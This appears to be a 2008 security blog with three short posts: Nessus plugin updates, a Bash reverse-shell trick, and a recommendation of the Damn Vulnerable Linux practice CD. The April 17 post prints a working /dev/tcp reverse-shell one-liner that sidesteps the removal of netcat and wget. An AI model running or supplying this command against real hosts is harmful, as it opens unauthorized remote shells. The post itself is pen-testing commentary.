May 16, 2008
We all know and love Nessus. Well today, Tenable made it even better. Nessus now fully supports su and sudo for audit and patch compliance checks. This is very cool.
Next, in response to the ssh key bruhaha this week, there are now a couple of plugins that will check for weak keys in SSH and SSL protected webservers.
Caveat: It appears that you need to be Direct Feed/Professional subscriber to use these features.
Kevin
No Comments » | 
Security testing, vulnerability scanning | Tagged: vulnerability scanning | 
Permalink
Posted by Kevin Riggins
April 17, 2008
Neohapsis just created a lot of pain for those who are trying to stop folks who able to execute arbitrary code on a host, but unable to get a reverse shell. Used to be you could remove netcat, wget, ftp, etc… and make it much more difficult for a reverse shell to be started. Enter the ever friendly and helpful Bash shell.
All you need is:
$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
and tadaa, reverse shell.
Go check it out - http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/
Kevin Riggins
1 Comment | Security testing, Web App Testing, red team | Tagged: pen testing, reverse shell, Web App Testing | Permalink
Posted by Kevin Riggins
March 28, 2008
You may all be aware of this, but I was not. Last night I was looking for a LiveCD to use for testing some web app testing tools against. A couple of fine folks, Craig and Wesley suggested I check Damn Vulnerable Linux. So I did.
After a couple hours of download time, the thing is 1.5 GBs, I fired up a virtual machine, booted the iso, started apache and began poking about. They have put together a fine set of vulnerable applications and web pages that are very useful for both learning about pen/web security testing and testing new tools you might come across. The testing part is good for keeping the intarweb police jackboots off you neck 
Check it out.
-Kevin
No Comments » | Security testing | Permalink
Posted by Kevin Riggins
